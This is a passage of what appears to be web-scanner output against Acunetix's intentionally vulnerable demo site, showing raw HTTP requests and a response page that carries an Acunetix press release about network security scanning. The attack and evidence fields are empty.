wgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
